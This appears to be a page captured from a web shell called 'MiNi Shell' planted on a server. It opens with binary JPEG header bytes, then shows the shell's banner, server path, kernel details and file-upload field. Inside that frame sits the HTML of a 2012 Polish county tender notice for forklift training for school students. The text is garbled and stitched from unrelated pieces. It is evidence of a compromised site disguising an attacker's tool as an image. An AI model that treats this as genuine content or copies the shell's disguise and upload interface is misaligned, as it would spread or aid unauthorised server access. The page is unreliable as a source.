JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120221/52300-N-2012.html

<p class="kh_header"><b>Świecie: Przeprowadzenie zajęć z zakresu obsługi wózków jezdniowych dla 30 uczennic i uczniów Zespołu Szkół Ponadgimnazjalnych w Świeciu, 20 uczennic i uczniów Zespołu Szkół Ponadgimnazjalnych w Nowem i 10 uczennic i uczniów Zespołu Szkół Specjalnych nr 1 w Świeciu - uczestniczek i uczestników Projektu pn.: Dobre kształcenie - lepszy start zawodowy III, realizowanego przez Powiat Świecki w latach 2011 - 2013, w ramach PO KL, Priorytet IX ,Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, współfinansowanego przez UE w ramach EFS</b><br>
<b>Numer ogłoszenia: 52300 - 2012; data zamieszczenia: 21.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świecki , ul. Gen. Józefa Hallera 9, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 56 83 100, faks 52 56 83 102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.swiecki.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć z zakresu obsługi wózków jezdniowych dla 30 uczennic i uczniów Zespołu Szkół Ponadgimnazjalnych w Świeciu, 20 uczennic i uczniów Zespołu Szkół Ponadgimnazjalnych w Nowem i 10 uczennic i uczniów Zespołu Szkół Specjalnych nr 1 w Świeciu - uczestniczek i uczestników Projektu pn.: Dobre kształcenie - lepszy start zawodowy III, realizowanego przez Powiat Świecki w latach 2011 - 2013, w ramach PO KL, Priorytet IX ,Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, współfinansowanego przez UE w ramach EFS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie zajęć z zakresu obsługi wózków jezdniowych dla 60 uczestniczek i uczestników Projektu pn.: Dobre kształcenie - lepszy start zawodowy III, tj. 30 uczennic i uczniów Zespołu Szkół Ponadgimnazjalnych w Świeciu, ul. Kościuszki 6A, 86-100 Świecie, 20 uczennic i uczniów Zespołu Szkół Ponadgimnazjalnych w Nowem, ul. Myśliwska 1, 86-170 Nowe i 10 uczennic i uczniów Zespołu Szkół Specjalnych nr 1 w Świeciu, ul. Paderewskiego 5A, 86 - 105 Świecie.
2. Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji przedmiotu zamówienia:
1) Wykonawca zobowiązany jest do zorganizowania i przeprowadzenie zajęć z zakresu obsługi wózków jezdniowych, których celem jest nabycie przez uczestniczki i uczestników teoretycznych i praktycznych umiejętności z zakresu obsługi wózków jezdniowych;
2) zajęcia dla grup z ZSP w Świeciu i ZSP w Nowem muszą obejmować realizację co najmniej 71 godzin (1 godz. zajęć = 45 minut) dla każdej grupy, z czego:
a) co najmniej 44 godziny zagadnień teoretycznych dla każdej grupy,
b) co najmniej 15 godzin praktycznej nauki jazdy dla każdej grupy,
c) co najmniej 8 godzin praktycznej nauki wymiany i obsługi butli gazowych w wózkach jezdniowych dla każdej grupy,
d) oraz 4 godziny dodatkowe obejmujące: 1 godz. na przeprowadzenie rozmowy sterowanej na temat równości płci, 2 godz. na przeprowadzenie testów mierzących poziom wiedzy uczestniczek i uczestników zajęć, tj.: 1 godz. na początku zajęć i 1 godz. na zakończenie zajęć oraz 1 godz. na egzamin wewnętrzny;
3) zajęcia dla grup z ZSS nr 1 w Świeciu muszą obejmować realizację co najmniej 77 godzin  (1 godz. zajęć = 45 minut) dla każdej grupy, z czego:
a) co najmniej 47 godzin zagadnień teoretycznych dla każdej grupy,
b) co najmniej 18 godzin praktycznej nauki jazdy dla każdej grupy;
c) co najmniej 8 godzin praktycznej nauki wymiany i obsługi butli gazowych w wózkach jezdniowych dla każdej grupy,
d) oraz 4 godziny dodatkowe obejmujące: 1 godz. na przeprowadzenie rozmowy sterowanej na temat równości płci, 2 godz. na przeprowadzenie testów mierzących poziom wiedzy uczestniczek i uczestników zajęć,  tj.: 1 godz. na początku zajęć i 1 godz. na zakończenie zajęć oraz 1 godz. na egzamin wewnętrzny;
Program i forma zajęć, w których wezmą udział osoby niepełnosprawne intelektualne musi być dostosowany do ich potrzeb i możliwości.
4) zajęcia teoretyczne odbywać się muszą w grupach 10 osobowych dla uczennic i uczniów ZSP w Świeciu i w ZSP w Nowem oraz w grupach 5 osobowych dla uczennic i uczniów ZSS nr 1 w Świeciu, liczebność grup nie może być zwiększona o osoby z wolnego naboru;
5) zajęcia praktyczne muszą odbywać się grupach nie większych niż 3 osobowe;
6) zajęcia muszą odbywać się poza zajęciami szkolnymi lub w dni wolne od nauki i nie więcej niż 8 godz. dziennie;
7) zajęcia teoretyczne powinny odbywać się na terenie szkoły, w sali nieodpłatnie udostępnionej Wykonawcy przez dyrektora szkoły, tj. na terenie ZSP w Świeciu dla uczennic i uczniów ZSP w Świeciu i ZSS nr 1 w Świeciu oraz na terenie ZSP w Nowem dla uczennic i uczniów ZSP w Nowem. Dopuszcza się prowadzenie zajęć teoretycznych w siedzibie Wykonawcy lub w innym miejscu pod warunkiem zapewnienia każdej uczestniczce i uczestnikowi bezpłatnego dowozu z terenu szkoły do miejsca prowadzenia zajęć oraz odwozu z powrotem;
8) zajęcia praktyczne realizowane na utwardzonym placu manewrowym powinny odbywać się na terenie miasta Świecia i Nowe lub na dowolnym placu wskazanym przez Wykonawcę w formularzu ofertowym pod warunkiem zapewnienia każdej uczestniczce i uczestnikowi bezpłatnego dowozu z terenu szkoły do miejsca prowadzenia zajęć oraz odwozu z powrotem;
9) Program zajęć musi obejmować następujące zagadnienia:
a) wiadomości na temat typów stosowanych wózków jezdniowych,
b) budowę wózków,
c)  czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po jej zakończeniu, 
d) czynności kierowcy w czasie pracy wózkami,
e) wiadomości z zakresu ładunkoznawstwa,
f) wiadomości z zakresu BHP i udzielania pierwszej pomocy,
g) wiadomości o dozorze technicznym,
h) praktyczną naukę jazdy,
i)  bezpieczną wymianę i obsługę butli z gazem propan - butan w wózkach jezdniowych;
10) Wykonawca zobowiązany jest opracować Program zajęć zgodnie z w/w zagadnieniami, według programu opracowanego lub zatwierdzonego przez jednostkę organizacyjną wyznaczoną przez ministra właściwego do spraw gospodarki oraz liczbą godzin wskazaną pkt 2 i 3 zgodnie z załączonym wzorem - załącznik nr 7 do SIWZ;
11) Wykonawca w zakresie świadczonej usługi zapewni każdej uczestniczce    i uczestnikowi przed rozpoczęciem zajęć w ramach ceny ofertowej:
a) przeprowadzenie badań lekarskich - kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu, 
b) dodatkowe ubezpieczenie od następstw nieszczęśliwych wypadków od dnia rozpoczęcia zajęć do dnia zakończenia zajęć. Kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu,
c) materiały szkoleniowe;
12) Wykonawca zapewni uczestniczkom i uczestnikom w czasie trwania zajęć bezpieczne i higieniczne warunki nauki;
13) Wykonawca ponosi pełną odpowiedzialność za uczestniczki i uczestników w czasie trwania zajęć.
3. Obowiązki Wykonawcy wynikające z realizacji przedmiotu zamówienia:
1) oznakowanie sal, w których będą prowadzone zajęcia teoretyczne oraz dokumentacji zajęć, wywieszanie plakatów, posługiwanie się logotypami UE oraz PO KL itp. zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym - Ministerstwo Rozwoju Regionalnego - 4 luty 2009 r.;
2) poinformowanie uczestniczek i uczestników zajęć, iż są one współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego;
3) przeprowadzenie z uczestniczkami i uczestnikami zajęć rozmowy sterowanej na temat równości płci na pierwszych zajęciach;
4) przeprowadzenie na początku i na końcu zajęć testu (opracowanego przez Wykonawcę) mierzącego poziom wiedzy i umiejętności uczestniczek i uczestników. Test musi zawierać co najmniej 20 pytań z zakresu wiedzy objętej programem zajęć;
5) opracowanie i uzgodnienie z koordynatorami szkolnymi i dyrektorami szkół harmonogramów zajęć teoretycznych i praktycznych;
6) niezwłoczne powiadamianie koordynatora szkolnego o wszelkich zmianach w ustalonym harmonogramie zajęć;
7) bieżące sporządzanie dokumentacji związanej z realizacją zadania, w szczególności prowadzenie Dziennika zajęć i List obecności uczestniczek i uczestników zajęć na formularzach, których wzór określi Zamawiający;
8) niezwłoczne informowanie koordynatora szkolnego o nie zgłoszeniu się którejkolwiek uczestniczki lub uczestnika na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
9) poddania się kontroli dokonywanej przez uprawnione podmioty w zakresie prawidłowości realizacji zadania;
10) wypracowanie następujących rezultatów:
a)  co najmniej 90 % uczestniczek i uczestników zakończy udział w zajęciach, 
b) u minimum 60 % uczestniczek i uczestników nastąpi przyrost wiadomości   i umiejętności w zakresie wiedzy specjalistycznej;
11) zorganizowanie i przeprowadzenie egzaminu wewnętrznego dla uczestniczek i uczestników zajęć;
12) przygotowanie i wydanie uczestniczkom i uczestnikom, którzy ukończyli zajęcia, zaświadczenia o ukończeniu zajęć na drukach opatrzonych logotypami PO KL i UE;
13) umożliwienie uczestniczkom i uczestnikom, którzy ukończyli zajęcia, uzyskanie zaświadczenia kwalifikacyjnego do obsługi wózków jezdniowych wydanego przez organ właściwej jednostki Urzędu Dozory Technicznego;
14) przekazanie Zamawiającemu całej dokumentacji z prowadzonych zajęć,     w szczególności: Dziennika zajęć, List obecności, testów mierzących poziom wiedzy i umiejętności uczestniczek i uczestników zajęć, protokołu z egzaminu wewnętrznego, rejestru i kopii wydanych zaświadczeń, itp., w terminie do 10 dni od ich zakończenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest złożyć dokument potwierdzający legalne posiadanie ramowego programu nauczania kierowców wózków jezdniowych z napędem silnikowym, opracowanego lub zatwierdzonego przez jednostkę organizacyjną wyznaczoną przez ministra właściwego do spraw gospodarki. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w Rozdziale VIII SIWZ. Z treści załączonych dokumentów musi wynikać, że wykonawca spełnia w/w warunek. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia spełniania niniejszego warunku wystarczy dołączone do oferty przez Wykonawcę Oświadczenie z wykorzystaniem wzoru Załącznik nr 3 do SIWZ.Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w Rozdziale VIII SIWZ. Z treści załączonych dokumentów musi wynikać, że wykonawca spełnia w/w warunek. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował co najmniej dwoma rodzajami wózków jezdniowych dopuszczonymi do użytkowania przez uprawnione organy, w tym jednym wózkiem jezdniowym podnośnikowym - z wykorzystaniem wzoru Załącznik nr 5 do SIWZ. Do oferty należy dołączyć kserokopie dokumentów wydanych przez uprawiony organ (poświadczone za zgodność z oryginałem), zezwalające na eksploatację wózków jezdniowych będących do dyspozycji Wykonawcy.Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w Rozdziale VIII SIWZ. Z treści załączonych dokumentów musi wynikać, że wykonawca spełnia w/w warunek. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował: co najmniej jednym instruktorem/wykładowcą, który posiada zaświadczenie/certyfikat uprawniający do prowadzenia zajęć teoretycznych i praktycznych                   z zakresu obsługi wózków jezdniowych, wydany przez uprawnione organy lub ma ukończone seminarium dla instruktorów/wykładowców; co najmniej jednym instruktorem/wykładowcą mającym uprawnienia do prowadzenia zajęć z obsługi butli gazowych oraz co najmniej jednym instruktorem/wykładowcą mającym uprawnienia przewodniczącego komisji egzaminacyjnej - z wykorzystaniem wzoru Załącznik nr 6 do SIWZ. W przypadku, gdy jeden instruktor/wykładowca posiada wszystkie wymagane przez Zamawiającego uprawnienia tj. uprawnienia do prowadzenia zajęć teoretycznych, praktycznych i obsługi butli gazowych oraz uprawnienia przewodniczącego komisji egzaminacyjnej, Wykonawca wykazuje tego jednego instruktora/wykładowcę. Do oferty należy dołączyć dokumenty (kserokopie poświadczone za zgodność z oryginałem) potwierdzające posiadanie wymaganych kwalifikacji przez instruktorów/wykładowców.Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w Rozdziale VIII SIWZ. Z treści załączonych dokumentów musi wynikać, że wykonawca spełnia w/w warunek. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia spełniania niniejszego warunku wystarczy dołączenie do oferty Oświadczenia z wykorzystaniem wzoru Załącznik nr 3 do SIWZ.Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w Rozdziale VIII SIWZ. Z treści załączonych dokumentów musi wynikać, że wykonawca spełnia w/w warunek. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy z wykorzystaniem wzoru Załącznik nr 1 do SIWZ;
2) Dokument potwierdzający uprawnienia osoby/osób do złożenia oferty, w przypadku, gdy to nie wynika z innych załączonych do oferty dokumentów (np. pełnomocnictwo osoby/osób podpisujących ofertę, w formie oryginału lub kserokopii potwierdzonej notarialnie, o ile ofertę składa pełnomocnik, aktualny dokument rejestrowy z którego wynika umocowanie do podpisania oferty);
3) Program zajęć z wykorzystaniem wzoru Załącznik nr 7 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian w zawartej umowie w zakresie: 
1) przesunięcia terminu wykonania przedmiotu zamówienia w następujących przypadkach:
a) zmiany we wniosku o dofinansowanie Projektu pn.: Dobre kształcenie - lepszy start zawodowy III, a w szczególności zmiany harmonogramu realizacji zadań,
b) zdarzeń losowych leżących po stronie uczestniczki lub uczestnika Projektu, uzasadniających przedłużenie terminu zakończenia zajęć;
2) zmiany wynagrodzenia Wykonawcy w następujących przypadkach: 
a) zmiany ilości uczestniczek i uczestników,
b) rezygnacji lub przerwania zajęć przez uczestniczkę/uczestnika w trakcie ich trwania i nie uzupełnienia składu osobowego grupy;
3) zmiany osoby do kontaktu ze strony Wykonawcy lub zmiany osoby do kontaktu ze strony Zamawiającego;
4) zaistnienia obiektywnych, niezależnych od stron przeszkód w realizacji umowy w dotychczasowym kształcie.
2. Zmiana postanowień zawartej umowy może nastąpić również w przypadku zmiany powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.swiecki.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Ekonomiczno - Administracyjny Szkół
ul. Gen. J. Hallera 9; pok. 405; 86 - 100 Świecie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2012 godzina 14:00, miejsce: Powiatowy Zespół Ekonomiczno - Administracyjny Szkół
ul. Gen. J. Hallera 9; pok. 405; 86 - 100 Świecie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, Projektu Dobre kształcenie - lepszy start zawodowy III, Nr Projektu WND-POKL.09.02.00-04-002/11.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com